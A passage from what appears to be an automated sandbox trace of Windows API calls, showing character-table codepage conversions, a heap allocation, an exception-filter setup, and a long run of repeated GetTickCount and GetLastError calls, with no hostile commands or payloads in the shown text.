!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿó\x14¤*\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0127.698] GetLastError () returned 0x0 [0127.698] SetLastError (dwErrCode=0x0) [0127.698] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 256 [0127.698] MultiByteToWideChar (in: CodePage=0x4e4, dwFlags=0x1, lpMultiByteStr=0x18fd64, cbMultiByte=256, lpWideCharStr=0x18f6b8, cchWideChar=256 | out: lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㝪⨛@Ā") returned 256 [0127.698] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㝪⨛@Ā", cchSrc=256, lpDestStr=0x0, cchDest=0 | out: lpDestStr=0x0) returned 256 [0127.698] LCMapStringW (in: Locale=0x0, dwMapFlags=0x200, lpSrcStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f€\x81‚ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™š›œ\x9džŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ㝪⨛@Ā", cchSrc=256, lpDestStr=0x18f4a8, cchDest=256 | out: lpDestStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ") returned 256 [0127.698] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸĀ", cchWideChar=256, lpMultiByteStr=0x18fb64, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞ\x9f \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9eÿ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿àáâãäåæçèéêëìíîïðñòóôõö×øùúûüýþßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿ \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`abcdefghijklmnopqrstuvwxyz{|}~\x7f\x80\x81\x82\x83\x84…\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßàáâãäåæçèéêëìíîïðñòóôõö÷øùúûüýþÿó\x14¤*\x9cþ\x18", lpUsedDefaultChar=0x0) returned 256 [0127.698] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x80) returned 0x271c28 [0127.699] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40636c) returned 0x0 [0127.699] RtlSizeHeap (HeapHandle=0x270000, Flags=0x0, MemoryPointer=0x271c28) returned 0x80 [0127.700] GetTickCount () returned 0x1152c5e [0127.700] GetLastError () returned 0x0 [0127.700] GetTickCount () returned 0x1152c5e [0127.700] GetLastError () returned 0x0 [0127.700] GetTickCount () returned 0x1152c5e [0127.700] GetLastError () returned 0x0 [0127.700] GetTickCount () returned 0x1152c5e [0127.700] GetLastError () returned 0x0 [0127.700] GetTickCount () returned 0x1152c5e [0127.700] GetLastError () returned 0x0 [0127.700] GetTickCount () returned 0x1152c5e [0127.700] GetLastError () returned 0x0 [0127.700] GetTickCount () returned 0x1152c5e [0127.700] GetLastError () returned 0x0 [0127.700] GetTickCount () returned 0x1152c5e [0127.700] GetLastError () returned 0x0 [0127.700] GetTickCount () returned 0x1152c5e [0127.700] GetLastError () returned 0x0 [0127.700] GetTickCount () returned 0x1152c5e [0127.700] GetLastError () returned 0x0 [0127.700] GetTickCount () returned 0x1152c5e [0127.700] GetLastError () returned 0x0 [0127.700] GetTickCount () returned 0x1152c5e [0127.700] GetLastError () returned 0x0 [0127.700] GetTickCount () returned 0x1152c5e [0127.700] GetLastError () returned 0x0 [0127.700] GetTickCount () returned 0x1152c5e [0127.700] GetLastError () returned 0x0 [0127.700] GetTickCount () returned 0x1152c5e [0127.700] GetLastError () returned 0x0 [0127.700] GetTickCount () returned 0x1152c5e [0127.700] GetLastError () returned 0x0 [0127.700] GetTickCount () returned 0x1152c5e [0127.701] GetLastError () returned 0x0 [0127.701] GetTickCount () returned 0x1152c5e [0127.701] GetLastError () returned 0x0 [0127.701] GetTickCount () returned 0x1152c5e [0127.701] GetLastError () returned 0x0 [0127.701] GetTickCount () returned 0x1152c5e [0127.701] GetLastError () returned 0x0 [0127.701] GetTickCount () returned 0x1152c5e [0127.701] GetLastError () returned 0x0 [0127.701] GetTickCount () returned 0x1152c5e [0127.701] GetLastError () returned 0x0 [0127.701] GetTickCount () returned 0x1152c5e [0127.701] GetLastError () returned 0x0 [0127.701] GetTickCount () returned 0x1152c5e [0127.701] GetLastError () returned 0x0 [0127.701] GetTickCount () returned 0x1152c5e [0127.701] GetLastError () returned 0x0 [0127.701] GetTickCount () returned 0x1152c5e [0127.701] GetLastError () returned 0x0 [0127.701] GetTickCount () returned 0x1152c5e [0127.701] GetLastError () returned 0x0 [0127.701] GetTickCount () returned 0x1152c5e [0127.701] GetLastError () returned 0x0 [0127.701] GetTickCount () returned 0x1152c5e [0127.701] GetLastError () returned 0x0 [0127.701] GetTickCount () returned 0x1152c5e [0127.701] GetLastError () returned 0x0 [0127.701] GetTickCount () returned 0x1152c5e [0127.701] GetLastError () returned 0x0 [0127.701] GetTickCount () returned 0x1152c5e [0127.701] GetLastError () returned 0x0 [0127.701] GetTickCount () returned 0x1152c5e [0127.701] GetLastError () returned 0x0 [0127.702] GetTickCount () returned 0x1152c5e [0127.702] GetLastError () returned 0x0 [0127.702] GetTickCount () returned 0x1152c5e [0127.702] GetLastError () returned 0x0 [0127.702] GetTickCount () returned 0x1152c5e [0127.702] GetLastError () returned 0x0 [0127.702] GetTickCount () returned 0x1152c5e [0127.702] GetLastError () returned 0x0 [0127.702] GetTickCount () returned 0x1152c5e [0127.702] GetLastError () returned 0x0 [0127.702] GetTickCount () returned 0x1152c5e [0127.702] GetLastError () returned 0x0 [0127.702] GetTickCount () returned 0x1152c5e [0127.702] GetLastError () returned 0x0 [0127.702] GetTickCount () returned 0x1152c5e [0127.702] GetLastError () returned 0x0 [0127.702] GetTickCount () returned 0x1152c5e [0127.702] GetLastError () returned 0x0 [0127.702] GetTickCount () returned 0x1152c5e [0127.702] GetLastError () returned 0x0 [0127.702] GetTickCount () returned 0x1152c5e [0127.702] GetLastError () returned 0x0 [0127.702] GetTickCount () returned 0x1152c5e [0127.702] GetLastError () returned 0x0 [0127.702] GetTickCount () returned 0x1152c5e [0127.702] GetLastError () returned 0x0 [0127.702] GetTickCount () returned 0x1152c6e [0127.703] GetLastError () returned 0x0 [0127.703] GetTickCount () returned 0x1152c6e [0127.703] GetLastError () returned 0x0 [0127.703] GetTickCount () returned 0x1152c6e [0127.703] GetLastError () returned 0x0 [0127.703] GetTickCount () returned 0x1152c6e [0127.703] GetLastError () returned 0x0 [0127.703] GetTickCount () returned 0x1152c6e [0127.703] GetLastError () returned 0x0 [0127.703] GetTickCount () returned 0x1152c6e [0127.703] GetLastError () returned 0x0 [0127.703] GetTickCount () returned 0x1152c6e [0127.703] GetLastError () returned 0x0 [0127.703] GetTickCount () returned 0x1152c6e [0127.703] GetLastError () returned 0x0 [0127.703] GetTickCount () returned 0x1152c6e [0127.703] GetLastError () returned 0x0 [0127.703] GetTickCount () returned 0x1152c6e [0127.703] GetLastError () returned 0x0 [0127.703] GetTickCount () returned 0x1152c6e [0127.703] GetLastError () returned 0x0 [0127.703] GetTickCount () returned 0x1152c6e [0127.703] GetLastError () returned 0x0 [0127.703] GetTickCount () returned 0x1152c6e [0127.703] GetLastError () returned 0x0 [0127.703] GetTickCount () returned 0x1152c6e [0127.703] GetLastError () returned 0x0 [0127.703] GetTickCount () returned 0x1152c6e [0127.703] GetLastError () returned 0x0 [0127.704] GetTickCount () returned 0x1152c6e [0127.704] GetLastError () returned 0x0 [0127.704] GetTickCount () returned 0x1152c6e [0127.704] GetLastError () returned 0x0 [0127.704] GetTickCount () returned 0x1152c6e [0127.704] GetLastError () returned 0x0 [0127.704] GetTickCount () returned 0x1152c6e [0127.704] GetLastError () returned 0x0 [0127.704] GetTickCount () returned 0x1152c6e [0127.704] GetLastError () returned 0x0 [0127.704] GetTickCount () returned 0x1152c6e [0127.704] GetLastError () returned 0x0 [0127.704] GetTickCount () returned 0x1152c6e [0127.704] GetLastError () returned 0x0 [0127.704] GetTickCount () returned 0x1152c6e [0127.704] GetLastError () returned 0x0 [0127.704] GetTickCount () returned 0x1152c6e [0127.704] GetLastError () returned 0x0 [0127.704] GetTickCount () returned 0x1152c6e [0127.704] GetLastError () returned 0x0 [0127.704] GetTickCount () returned 0x1152c6e [0127.704] GetLastError () returned 0x0 [0127.704] GetTickCount () returned 0x1152c6e [0127.704] GetLastError () returned 0x0 [0127.704] GetTickCount () returned 0x1152c6e [0127.704] GetLastError () returned 0x0 [0127.704] GetTickCount () returned 0x1152c6e [0127.704] GetLastError () returned 0x0 [0127.704] GetTickCount () returned 0x1152c6e [0127.704] GetLastError () returned 0x0 [0127.704] GetTickCount () returned 0x1152c6e [0127.704] GetLastError () returned 0x0 [0127.704] GetTickCount () returned 0x1152c6e [0127.704] GetLastError () returned 0x0 [0127.705] GetTickCount () returned 0x1152c6e [0127.705] GetLastError () returned 0x0 [0127.705] GetTickCount () returned 0x1152c6e [0127.705] GetLastError () returned 0x0 [0127.705] GetTickCount () returned 0x1152c6e [0127.705] GetLastError () returned 0x0 [0127.705] GetTickCount () returned 0x1152c6e [0127.705] GetLastError () returned 0x0 [0127.705] GetTickCount () returned 0x1152c6e [0127.705] GetLastError () returned 0x0 [0127.705] GetTickCount () returned 0x1152c6e [0127.705] GetLastError () returned 0x0 [0127.705] GetTickCount () returned 0x1152c6e [0127.705] GetLastError () returned 0x0 [0127.705] GetTickCount () returned 0x1152c6e [0127.705] GetLastError () returned 0x0 [0127.705] GetTickCount () returned 0x1152c6e [0127.705] GetLastError () returned 0x0 [0127.705] GetTickCount () returned 0x1152c6e [0127.705] GetLastError () returned 0x0 [0127.705] GetTickCount () returned 0x1152c6e [0127.705] GetLastError () returned 0x0 [0127.705] GetTickCount () returned 0x1152c6e [0127.705] GetLastError () returned 0x0 [0127.705] GetTickCount () returned 0x1152c6e [0127.705] GetLastError () returned 0x0 [0127.705] GetTickCount () returned 0x1152c6e [0127.705] GetLastError () returned 0x0 [0127.705] GetTickCount () returned 0x1152c6e [0127.705] GetLastError () returned 0x0 [0127.705] GetTickCount () returned 0x1152c6e [0127.705] GetLastError () returned 0x0 [0127.705] GetTickCount () returned 0x1152c6e [0127.705] GetLastError () returned 0x0 [0127.706] GetTickCount () returned 0x1152c6e [0127.706] GetLastError () returned 0x0 [0127.706] GetTickCount () returned 0x1152c6e [0127.706] GetLastError () returned 0x0 [0127.706] GetTickCount () returned 0x1152c6e [0127.706] GetLastError () returned 0x0 [0127.706] GetTickCount () returned 0x1152c6e [0127.706] GetLastError () returned 0x0 [0127.706] GetTickCount () returned 0x1152c6e [0127.706] GetLastError () returned 0x0 [0127.706] GetTickCount () returned 0x1152c6e [0127.706] GetLastError () returned 0x0 [0127.706] GetTickCount () returned 0x1152c6e [0127.706] GetLastError () returned 0x0 [0127.706] GetTickCount () returned 0x1152c6e [0127.706] GetLastError () returned 0x0 [0127.706] GetTickCount () returned 0x1152c6e [0127.706] GetLastError () returned 0x0 [0127.706] GetTickCount () returned 0x1152c6e [0127.706] GetLastError () returned 0x0 [0127.706] GetTickCount () returned 0x1152c6e [0127.706] GetLastError () returned 0x0 [0127.706] GetTickCount () returned 0x1152c6e [0127.706] GetLastError () returned 0x0 [0127.706] GetTickCount () returned 0x1152c6e [0127.706] GetLastError () returned 0x0 [0127.706] GetTickCount () returned 0x1152c6e [0127.706] GetLastError () returned 0x0 [0127.706] GetTickCount () returned 0x1152c6e [0127.706] GetLastError () returned 0x0 [0127.706] GetTickCount () returned 0x1152c6e [0127.706] GetLastError () returned 0x0 [0127.706] GetTickCount () returned 0x1152c6e [0127.706] GetLastError () returned 0x0 [0127.706] GetTickCount () returned 0x1152c6e [0127.707] GetLastError () returned 0x0 [0127.707] GetTickCount () returned 0x1152c6e [0127.707] GetLastError () returned 0x0 [0127.707] GetTickCount () returned 0x1152c6e [0127.707] GetLastError () returned 0x0 [0127.707] GetTickCount () returned 0x1152c6e [0127.707] GetLastError () returned 0x0 [0127.707] GetTickCount () returned 0x1152c6e [0127.707] GetLastError () returned 0x0 [0127.707] GetTickCount () returned 0x1152c6e [0127.707] GetLastError () returned 0x0 [0127.707] GetTickCount () returned 0x1152c6e [0127.707] GetLastError () returned 0x0 [0127.707] GetTickCount () returned 0x1152c6e [0127.707] GetLastError () returned 0x0 [0127.707] GetTickCount () returned 0x1152c6e [0127.707] GetLastError () returned 0x0 [0127.707] GetTickCount () returned 0x1152c6e [0127.707] GetLastError () returned 0x0 [0127.707] GetTickCount () returned 0x1152c6e [0127.707] GetLastError () returned 0x0 [0127.707] GetTickCount () returned 0x1152c6e [0127.707] GetLastError () returned 0x0 [0127.707] GetTickCount () returned 0x1152c6e [0127.707] GetLastError () returned 0x0 [0127.707] GetTickCount () returned 0x1152c6e [0127.707] GetLastError () returned 0x0 [0127.707] GetTickCount () returned 0x1152c6e [0127.707] GetLastError () returned 0x0 [0127.707] GetTickCount () returned 0x1152c6e [0127.707] GetLastError () returned 0x0 [0127.707] GetTickCount () returned 0x1152c6e [0127.707] GetLastError () returned 0x0 [0127.707] GetTickCount () returned 0x1152c6e [0127.708] GetLastError () returned 0x0 [0127.708] GetTickCount () returned 0x1152c6e [0127.708] GetLastError () returned 0x0 [0127.708] GetTickCount () returned 0x1152c6e [0127.708] GetLastError () returned 0x0 [0127.708] GetTickCount () returned 0x1152c6e [0127.708] GetLastError () returned 0x0 [0127.708] GetTickCount () returned 0x1152c6e [0127.708] GetLastError () returned 0x0 [0127.708] GetTickCount () returned 0x1152c6e [0127.708] GetLastError () returned 0x0 [0127.708] GetTickCount () returned 0x1152c6e [0127.708] GetLastError () returned 0x0 [0127.708] GetTickCount () returned 0x1152c6e [0127.708] GetLastError () returned 0x0 [0127.708] GetTickCount () returned 0x1152c6e [0127.708] GetLastError () returned 0x0 [0127.708] GetTickCount () returned 0x1152c6e [0127.708] GetLastError () returned 0x0 [0127.708] GetTickCount () returned 0x1152c6e [0127.708] GetLastError () returned 0x0 [0127.708] GetTickCount () returned 0x1152c6e [0127.708] GetLastError () returned 0x0 [0127.708] GetTickCount () returned 0x1152c6e [0127.708] GetLastError () returned 0x0 [0127.708] GetTickCount () returned 0x1152c6e [0127.708] GetLastError () returned 0x0 [0127.708] GetTickCount () returned 0x1152c6e [0127.708] GetLastError () returned 0x0 [0127.708] GetTickCount () returned 0x1152c6e [0127.708] GetLastError () returned 0x0 [0127.708] GetTickCount () returned 0x1152c6e [0127.708] GetLastError () returned 0x0 [0127.709] GetTickCount () returned 0x1152c6e [0127.709] GetLastError () returned 0x0 [0127.709] GetTickCount () returned 0x1152c6e [0127.709] GetLastError () returned 0x0 [0127.709] GetTickCount () returned 0x1152c6e [0127.709] GetLastError () returned 0x0 [0127.709] GetTickCount () returned 0x1152c6e [0127.709] GetLastError () returned 0x0 [0127.709] GetTickCount () returned 0x1152c6e [0127.709] GetLastError () returned 0x0 [0127.709] GetTickCount () returned 0x1152c6e [0127.709] GetLastError () returned 0x0 [0127.709] GetTickCount () returned 0x1152c6e [0127.709] GetLastError () returned 0x0 [0127.709] GetTickCount () returned 0x1152c6e [0127.709] GetLastError () returned 0x0 [0127.709] GetTickCount () returned 0x1152c6e [0127.709] GetLastError () returned 0x0 [0127.709] GetTickCount () returned 0x1152c6e [0127.709] GetLastError () returned 0x0 [0127.709] GetTickCount () returned 0x1152c6e [0127.709] GetLastError () returned 0x0 [0127.709] GetTickCount () returned 0x1152c6e [0127.709] GetLastError () returned 0x0 [0127.709] GetTickCount () returned 0x1152c6e [0127.709] GetLastError () returned 0x0 [0127.709] GetTickCount () returned 0x1152c6e [0127.709] GetLastError () returned 0x0 [0127.709] GetTickCount () returned 0x1152c6e [0127.709] GetLastError () returned 0x0 [0127.709] GetTickCount () returned 0x1152c6e [0127.709] GetLastError () returned 0x0 [0127.709] GetTickCount () returned 0x1152c6e [0127.709] GetLastError () returned 0x0 [0127.710] GetTickCount () returned 0x1152c6e [0127.710] GetLastError () returned 0x0 [0127.710] GetTickCount () returned 0x1152c6e [0127.710] GetLastError () returned 0x0 [0127.710] GetTickCount () returned 0x1152c6e [0127.710] GetLastError () returned 0x0 [0127.710] GetTickCount () returned 0x1152c6e [0127.710] GetLastError () returned 0x0 [0127.710] GetTickCount () returned 0x1152c6e [0127.710] GetLastError () returned 0x0 [0127.710] GetTickCount () returned 0x1152c6e [0127.710] GetLastError () returned 0x0 [0127.710] GetTickCount () returned 0x1152c6e [0127.710] GetLastError () returned 0x0 [0127.710] GetTickCount () returned 0x1152c6e [0127.710] GetLastError () returned 0x0 [0127.710] GetTickCount () returned 0x1152c6e [0127.710] GetLastError () returned 0x0 [0127.710] GetTickCount () returned 0x1152c6e [0127.710] GetLastError () returned 0x0 [0127.710] GetTickCount () returned 0x1152c6e [0127.710] GetLastError () returned 0x0 [0127.710] GetTickCount () returned 0x1152c6e [0127.710] GetLastError () returned 0x0 [0127.710] GetTickCount () returned 0x1152c6e [0127.710] GetLastError () returned 0x0 [0127.710] GetTickCount () returned 0x1152c6e [0127.710] GetLastError () returned 0x0 [0127.710] GetTickCount () returned 0x1152c6e [0127.710] GetLastError () returned 0x0 [0127.710] GetTickCount () returned 0x1152c6e [0127.710] GetLastError () returned 0x0 [0127.710] GetTickCount () returned 0x1152c6e [0127.711] GetLastError () returned 0x0 [0127.711] GetTickCount () returned 0x1152c6e [0127.711] GetLastError () returned 0x0 [0127.711] GetTickCount () returned 0x1152c6e [0127.711] GetLastError () returned 0x0 [0127.711] GetTickCount () returned 0x1152c6e [0127.711] GetLastError () returned 0x0 [0127.711] GetTickCount () returned 0x1152c6e [0127.711] GetLastError () returned 0x0 [0127.711] GetTickCount () returned 0x1152c6e [0127.711] GetLastError () returned 0x0 [0127.711] GetTickCount () returned 0x1152c6e [0127.711] GetLastError () returned 0x0 [0127.711] GetTickCount () returned 0x1152c6e [0127.711] GetLastError () returned 0x0 [0127.711] GetTickCount () returned 0x1152c6e [0127.711] GetLastError () returned 0x0 [0127.711] GetTickCount () returned 0x1152c6e [0127.711] GetLastError () returned 0x0 [0127.711] GetTickCount () returned 0x1152c6e [0127.711] GetLastError () returned 0x0 [0127.711] GetTickCount () returned 0x1152c6e [0127.711] GetLastError () returned 0x0 [0127.711] GetTickCount () returned 0x1152c6e [0127.711] GetLastError () returned 0x0 [0127.711] GetTickCount () returned 0x1152c6e [0127.711] GetLastError () returned 0x0 [0127.711] GetTickCount () returned 0x1152c6e [0127.711] GetLastError () returned 0x0 [0127.711] GetTickCount () returned 0x1152c6e [0127.711] GetLastError () returned 0x0 [0127.711] GetTickCount () returned 0x1152c6e [0127.712] GetLastError () returned 0x0 [0127.712] GetTickCount () returned 0x1152c6e [0127.712] GetLastError () returned 0x0 [0127.712] GetTickCount () returned 0x1152c6e [0127.712] GetLastError () returned 0x0 [0127.712] GetTickCount () returned 0x1152c6e [0127.712] GetLastError () returned 0x0 [0127.712] GetTickCount () returned 0x1152c6e [0127.712] GetLastError () returned 0x0 [0127.712] GetTickCount () returned 0x1152c6e [0127.712] GetLastError () returned 0x0 [0127.712] GetTickCount () returned 0x1152c6e [0127.712] GetLastError () returned 0x0 [0127.712] GetTickCount () returned 0x1152c6e [0127.712] GetLastError () returned 0x0 [0127.712] GetTickCount () returned 0x1152c6e [0127.712] GetLastError () returned 0x0 [0127.712] GetTickCount () returned 0x1152c6e [0127.712] GetLastError () returned 0x0 [0127.712] GetTickCount () returned 0x1152c6e [0127.712] GetLastError () returned 0x0 [0127.712] GetTickCount () returned 0x1152c6e [0127.712] GetLastError () returned 0x0 [0127.712] GetTickCount () returned 0x1152c6e [0127.712] GetLastError () returned 0x0 [0127.712] GetTickCount () returned 0x1152c6e [0127.712] GetLastError () returned 0x0 [0127.712] GetTickCount () returned 0x1152c6e [0127.712] GetLastError () returned 0x0 [0127.712] GetTickCount () returned 0x1152c6e [0127.712] GetLastError () returned 0x0 [0127.712] GetTickCount () returned 0x1152c6e [0127.712] GetLastError () returned 0x0 [0127.712] GetTickCount () returned 0x1152c6e [0127.712] GetLastError () returned 0x0 [0127.712] GetTickCount () returned 0x1152c6e [0127.713] GetLastError () returned 0x0 [0127.713] GetTickCount () returned 0x1152c6e [0127.713] GetLastError () returned 0x0 [0127.713] GetTickCount () returned 0x1152c6e [0127.713] GetLastError () returned 0x0 [0127.713] GetTickCount () returned 0x1152c6e [0127.713] GetLastError () returned 0x0 [0127.713] GetTickCount () returned 0x1152c6e [0127.713] GetLastError () returned 0x0 [0127.713] GetTickCount () returned 0x1152c6e [0127.713] GetLastError () returned 0x0 [0127.713] GetTickCount () returned 0x1152c6e [0127.713] GetLastError () returned 0x0 [0127.713] GetTickCount () returned 0x1152c6e [0127.713] GetLastError () returned 0x0 [0127.713] GetTickCount () returned 0x1152c6e [0127.713] GetLastError () returned 0x0 [0127.713] GetTickCount () returned 0x1152c6e [0127.713] GetLastError () returned 0x0 [0127.713] GetTickCount () returned 0x1152c6e [0127.713] GetLastError () returned 0x0 [0127.713] GetTickCount () returned 0x1152c6e [0127.713] GetLastError () returned 0x0 [0127.713] GetTickCount () returned 0x1152c6e [0127.713] GetLastError () returned 0x0 [0127.713] GetTickCount () returned 0x1152c6e [0127.713] GetLastError () returned 0x0 [0127.713] GetTickCount () returned 0x1152c6e [0127.713] GetLastError () returned 0x0 [0127.713] GetTickCount () returned 0x1152c6e [0127.713] GetLastError () returned 0x0 [0127.713] GetTickCount () returned 0x1152c6e [0127.713] GetLastError () returned 0x0 [0127.713] GetTickCount () returned 0x1152c6e [0127.714] GetLastError () returned 0x0 [0127.714] GetTickCount () returned 0x1152c6e [0127.714] GetLastError () returned 0x0 [0127.714] GetTickCount () returned 0x1152c6e [0127.714] GetLastError () returned 0x0 [0127.714] GetTickCount () returned 0x1152c6e [0127.714] GetLastError () returned 0x0 [0127.714] GetTickCount () returned 0x1152c6e [0127.714] GetLastError () returned 0x0 [0127.714] GetTickCount () returned 0x1152c6e [0127.714] GetLastError () returned 0x0 [0127.714] GetTickCount () returned 0x1152c6e [0127.714] GetLastError () returned 0x0 [0127.714] GetTickCount () returned 0x1152c6e [0127.714] GetLastError () returned 0x0 [0127.714] GetTickCount () returned 0x1152c6e [0127.714] GetLastError () returned 0x0 [0127.714] GetTickCount () returned 0x1152c6e [0127.714] GetLastError () returned 0x0 [0127.714] GetTickCount () returned 0x1152c6e [0127.714] GetLastError () returned 0x0 [0127.714] GetTickCount () returned 0x1152c6e [0127.714] GetLastError () returned 0x0 [0127.714] GetTickCount () returned 0x1152c6e [0127.714] GetLastError () returned 0x0 [0127.714] GetTickCount () returned 0x1152c6e [0127.714] GetLastError () returned 0x0 [0127.714] GetTickCount () returned 0x1152c6e [0127.714] GetLastError () returned 0x0 [0127.714] GetTickCount () returned 0x1152c6e [0127.714] GetLastError () returned 0x0 [0127.714] GetTickCount () returned 0x1152c6e [0127.714] GetLastError () returned 0x0 [0127.714] GetTickCount () returned 0x1152c6e [0127.714] GetLastError () returned 0x0 [0127.715] 